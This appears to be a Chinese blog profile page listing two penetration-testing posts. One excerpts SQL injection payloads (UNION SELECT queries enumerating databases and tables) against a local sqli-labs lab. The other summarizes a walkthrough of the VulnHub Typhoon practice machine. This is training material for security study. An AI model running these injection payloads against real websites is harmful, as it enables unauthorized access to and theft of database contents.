- 博客(2)
- 资源 (1)
- 收藏
- 关注
原创 sql注入语句大全
http://127.0.0.1/Less-2/?id=-1 union select 1,database(),2231 %23//查询当前数据库union select 1,group_concat(schema_name),3 from information_schema.schemata %23http://127.0.0.1/Less-2/?id=-1 union select 1,group_concat(table_name),2231 from information_schema.t
2021-02-08 15:17:45 1101 1
转载 靶机渗透之Typhoon实战
本次的Typhoon靶机包含了几个漏洞和配置错误。你们可以用这个靶机来测试网络服务漏洞,配置错误,web应用漏洞,也可以进行密码破解攻击,提权,后渗透,还可以进行信息收集和DNS攻击。靶机下载地址:https://www.vulnhub.com/entry/typhoon-102,267/渗透测试方法· 网络扫描(Netdiscover和Nmap都行)· 方法一:利用MongoDB进行入侵· 查看robots.txt· 通过浏览器利用MongoDB· 获取凭证· SSH登录· 查看内核版本
2021-02-08 15:12:28 860
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人